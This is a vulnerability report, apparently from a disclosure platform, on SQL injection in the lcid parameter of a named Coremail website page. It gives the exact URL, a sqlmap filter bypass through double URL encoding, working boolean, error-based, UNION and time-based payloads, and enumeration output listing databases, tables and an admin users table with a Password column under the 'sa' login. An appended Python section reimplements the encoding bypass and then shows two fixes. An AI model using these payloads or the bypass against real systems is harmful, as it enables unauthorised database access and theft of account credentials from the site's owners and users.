### Summary:

The Coremail official website has a SQL injection. A filter sits in front of the page, but it can be bypassed.

### Details:

Vulnerable URL: http://www.coremail.cn/gjzc2/list_117.aspx?lcid=412

### Proof of vulnerability:

There is a filter, but running sqlmap with `--tamper=chardoubleencode.py` gets straight through it. That tamper script URL-encodes every character of the payload a second time (`SELECT` becomes `%2553%2545%254C%2545%2543%2554`), so a filter that decodes the request only once never sees a SQL keyword, while an application that decodes the parameter again before building its query gets the original payload back.

This is the sqlmap output for the injection point. Note that every payload first closes a `)` and later reopens one with `(`, so the `lcid` value is concatenated inside a parenthesised expression; the time-based technique is sqlmap's "heavy query" variant, a CPU-bound self cross join of `sysusers`, rather than `WAITFOR DELAY`:

```
Place: GET
Parameter: lcid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: lcid=412) AND 4972=4972 AND (7728=7728

    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: lcid=412) AND 8722=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(107)+CHAR(111)+CHAR(113)+(SELECT (CASE WHEN (8722=8722) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(118)+CHAR(106)+CHAR(113))) AND (9712=9712

    Type: UNION query
    Title: Generic UNION query (NULL) - 20 columns
    Payload: lcid=412) UNION ALL SELECT CHAR(113)+CHAR(113)+CHAR(107)+CHAR(111)+CHAR(113)+CHAR(107)+CHAR(116)+CHAR(65)+CHAR(115)+CHAR(111)+CHAR(66)+CHAR(77)+CHAR(112)+CHAR(118)+CHAR(77)+CHAR(113)+CHAR(120)+CHAR(118)+CHAR(106)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
    Payload: lcid=412) AND 6450=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND (8683=8683
---
```

Basic fingerprint sqlmap reported:

```
web server operating system: Windows
web application technology: ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
```

Databases enumerated:

```
available databases [7]:
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] ysxx201412197372
```

The current database is naturally ysxx201412197372. Its tables:

```
back-end DBMS: Microsoft SQL Server 2005
Database: ysxx201412197372
[93 tables]
+----------------------------+
| Whir_Cmn_Area              |
| Whir_Cnt_Attached          |
| Whir_Cnt_CreateLog         |
| Whir_Cnt_Relation          |
| Whir_Cnt_SubjectClass      |
| Whir_Cnt_SubjectClass      |
| Whir_Cnt_SubjectColumn     |
| Whir_Cnt_WorkFlowLogs      |
| Whir_Dev_Column            |
| Whir_Dev_ConfigStrategy    |
| Whir_Dev_Field             |
| Whir_Dev_FormArea          |
| Whir_Dev_FormArea          |
| Whir_Dev_FormDate          |
| Whir_Dev_FormOption        |
| Whir_Dev_FormUpload        |
| Whir_Dev_Menu              |
| Whir_Dev_Model             |
| Whir_Dev_Module            |
| Whir_Dev_Plugin            |
| Whir_Dev_SubmitForm        |
| Whir_Ext_AuditActivity     |
| Whir_Ext_Backup            |
| Whir_Ext_CollectField      |
| Whir_Ext_CollectField      |
| Whir_Ext_Gather            |
| Whir_Ext_GatherTable       |
| Whir_Ext_OperateLog        |
| Whir_Ext_SendEmailRecord   |
| Whir_Ext_SensitiveWords    |
| Whir_Ext_Tools             |
| Whir_Ext_Upload            |
| Whir_Ext_WorkFlow          |
| Whir_Mem_MemberGroup       |
| Whir_Mem_MemberGroup       |
| Whir_Oa_NewsConfig         |
| Whir_Oa_NewsTemp           |
| Whir_Plu_AdvertPosition    |
| Whir_Plu_AdvertPosition    |
| Whir_Plu_SiteMap           |
| Whir_Sec_Resources         |
| Whir_Sec_RolesInResources  |
| Whir_Sec_RolesInResources  |
| Whir_Sec_Users             |
| Whir_Sit_SiteInfo          |
| Whir_U_Category_Bak        |
| Whir_U_Category_Bak        |
| Whir_U_Content_Bak         |
| Whir_U_Content_Bak         |
| Whir_U_Content_Category    |
| Whir_U_Download_Bak        |
| Whir_U_Download_Bak        |
| Whir_U_Download_Category   |
| Whir_U_Feedback_Bak        |
| Whir_U_Feedback_Bak        |
| Whir_U_Forms_Bak           |
| Whir_U_Forms_Bak           |
| Whir_U_Jobs_Bak            |
| Whir_U_Jobs_Bak            |
| Whir_U_Jobs_Category       |
| Whir_U_Jobs_JobRequest     |
| Whir_U_Links_Bak           |
| Whir_U_Links_Bak           |
| Whir_U_Magazine_Bak        |
| Whir_U_Magazine_Bak        |
| Whir_U_Magazine_Chapter    |
| Whir_U_Magazine_Infor      |
| Whir_U_Product_Bak         |
| Whir_U_Product_Bak         |
| Whir_U_Product_Category    |
| Whir_U_SalesNet_Bak        |
| Whir_U_SalesNet_Bak        |
| Whir_U_SinglePage_Bak      |
| Whir_U_SinglePage_Bak      |
| Whir_U_SubContent_Bak      |
| Whir_U_SubContent_Bak      |
| Whir_U_SubContent_Category |
| Whir_U_SubForms_Bak        |
| Whir_U_SubForms_Bak        |
| Whir_U_SubPage_Bak         |
| Whir_U_SubPage_Bak         |
| Whir_U_SubProduct_Bak      |
| Whir_U_SubProduct_Bak      |
| Whir_U_SubProduct_Category |
| Whir_U_Survey_Answer       |
| Whir_U_Survey_Answer       |
| Whir_U_Survey_Bak          |
| Whir_U_Survey_Detail       |
| Whir_U_Survey_Question     |
| Whir_U_Vote_Answer         |
| Whir_U_Vote_Answer         |
| Whir_U_Vote_Bak            |
| Whir_U_Vote_Detail         |
+----------------------------+
```

Below is the table Whir_Sec_Users, i.e. the CMS back-office accounts, with a `Password` column next to `LoginName`:

```
Table: Whir_Sec_Users
[19 columns]
+----------------+
| Column         |
+----------------+
| CreateDate     |
| CreateUser     |
| Email          |
| IsDel          |
| LastLoginIP    |
| LastLoginTime  |
| LoginName      |
| LoginType      |
| Password       |
| RealName       |
| Remarks        |
| RolesId        |
| Sort           |
| State          |
| SystemLanguage |
| SystemSkin     |
| UpdateDate     |
| UpdateUser     |
| UserId         |
+----------------+
```

![8.jpg](https://images.seebug.org/upload/201504/2123174057d2cd3c9fe987c277d64a5b215c05d1.jpg)

The current database user is `sa`, so cross-database queries are possible. ReportServer is the SQL Server Reporting Services catalog database, which the same login can read:

```
Database: ReportServer
[27 tables]
+--------------------------+
| ActiveSubscriptions      |
| Batch                    |
| CachePolicy              |
| ChunkData                |
| ConfigurationInfo        |
| DataSource               |
| Event                    |
| ExecutionLog             |
| History                  |
| ModelDrill               |
| ModelItemPolicy          |
| ModelPerspective         |
| Notifications            |
| Policies                 |
| PolicyUserRole           |
| ReportSchedule           |
| Roles                    |
| RunningJobs              |
| Schedule                 |
| SecData                  |
| ServerParametersInstance |
| SnapshotData             |
| Subscriptions            |
| UpgradeInfo              |
| Users                    |
| Catalog                  |
| Keys                     |
+--------------------------+
```

The whole database could be dumped.... -_- I didn't dump it, didn't dump it, dump....
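The chain the report's sqlmap output shows, as an added example that is not part of the original report, of sqlmap, or of Coremail's code: the same transformation `chardoubleencode.py` applies to a payload, a naive keyword filter that decodes once and therefore misses it, a model of the vulnerable page that decodes a second time and so rebuilds the original payload, and the decoding of the `CHAR()` chains from the error-based and UNION payloads into the `qqkoq`/`qxvjq` marker strings that sqlmap later looks for in the conversion error. The filter, the second decode, the placeholder table name in the query and the SQL Server error text are constructed or assumed for the example; the payloads themselves are the ones quoted above. The last two functions show the two fixes: a filter that canonicalises before inspecting, and the real one, treating `lcid` as the integer it is.

```python
import re
import string
from urllib.parse import unquote

# Payload values copied from the report's sqlmap output (without the "lcid=" prefix).
ERROR_PAYLOAD = (
    "412) AND 8722=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(107)+CHAR(111)+CHAR(113)"
    "+(SELECT (CASE WHEN (8722=8722) THEN CHAR(49) ELSE CHAR(48) END))"
    "+CHAR(113)+CHAR(120)+CHAR(118)+CHAR(106)+CHAR(113))) AND (9712=9712"
)
UNION_FIRST_COLUMN = (
    "CHAR(113)+CHAR(113)+CHAR(107)+CHAR(111)+CHAR(113)+CHAR(107)+CHAR(116)+CHAR(65)"
    "+CHAR(115)+CHAR(111)+CHAR(66)+CHAR(77)+CHAR(112)+CHAR(118)+CHAR(77)"
    "+CHAR(113)+CHAR(120)+CHAR(118)+CHAR(106)+CHAR(113)"
)


def char_double_encode(payload: str) -> str:
    """Same transformation as sqlmap's chardoubleencode tamper: every character
    becomes %25XX (its %XX form encoded once more); a sequence that is already
    %XX-encoded becomes %25XX instead of being encoded a third time."""
    out, i = [], 0
    while i < len(payload):
        c = payload[i]
        if (c == "%" and i + 2 < len(payload)
                and payload[i + 1] in string.hexdigits
                and payload[i + 2] in string.hexdigits):
            out.append("%25" + payload[i + 1:i + 3])
            i += 3
        else:
            out.append("%%25%02X" % ord(c))
            i += 1
    return "".join(out)


# Constructed stand-in for a weak filter: decode the parameter once, then look for keywords.
KEYWORDS = re.compile(r"\b(select|union|convert|and)\b", re.IGNORECASE)


def naive_filter_blocks(raw_value: str) -> bool:
    return KEYWORDS.search(unquote(raw_value)) is not None


def backend_sees(raw_value: str) -> str:
    """Assumed model of the vulnerable page: the web server decodes the query string
    once and the page code decodes the parameter again before concatenating it.
    That second decode is what turns %25XX back into the original payload."""
    return unquote(unquote(raw_value))


def build_query(lcid_value: str) -> str:
    # Hypothetical concatenation; "list_table" is a placeholder, not a table from the
    # report. The value sits inside "( ... )" because every reported payload closes a
    # parenthesis first and reopens one at the end.
    return "SELECT * FROM list_table WHERE (lcid=%s)" % lcid_value


def decode_char_chain(expr: str) -> str:
    """Turn CHAR(n)+CHAR(m)+... (sqlmap's way of avoiding quotes on MSSQL) into text."""
    return "".join(chr(int(n)) for n in re.findall(r"CHAR\((\d+)\)", expr))


PREFIX = decode_char_chain("CHAR(113)+CHAR(113)+CHAR(107)+CHAR(111)+CHAR(113)")  # qqkoq
SUFFIX = decode_char_chain("CHAR(113)+CHAR(120)+CHAR(118)+CHAR(106)+CHAR(113)")  # qxvjq

# Constructed SQL Server conversion error (message 245) that the CONVERT(INT, ...) in
# the error-based payload provokes when the CASE branch yields CHAR(49), i.e. "1".
SAMPLE_ERROR = ("Conversion failed when converting the varchar value "
                "'qqkoq1qxvjq' to data type int.")


def extract_between_markers(text: str, prefix: str = PREFIX, suffix: str = SUFFIX):
    """What sqlmap does with the response: pull out whatever sits between its markers."""
    m = re.search(re.escape(prefix) + r"(.*?)" + re.escape(suffix), text, re.DOTALL)
    return m.group(1) if m else None


def canonicalize(value: str, max_rounds: int = 5) -> str:
    """Fix for the filter: decode until the value stops changing, so the check sees what
    the application will eventually see. Bounded so junk input cannot loop forever."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def hardened_filter_blocks(raw_value: str) -> bool:
    return KEYWORDS.search(canonicalize(raw_value)) is not None


def safe_lcid(value: str) -> int:
    """The real fix for this endpoint: lcid is a numeric id, so parse it as an integer
    (and bind it as a query parameter); anything else is rejected outright."""
    if not re.fullmatch(r"\d{1,9}", value):
        raise ValueError("lcid must be a positive integer")
    return int(value)
```

Running `char_double_encode(ERROR_PAYLOAD)` yields a value that `naive_filter_blocks` lets through while `backend_sees` hands the untouched payload to `build_query`; the same encoded value is caught by `hardened_filter_blocks`, and `safe_lcid` rejects every one of the report's payloads regardless of encoding because none of them is a plain integer.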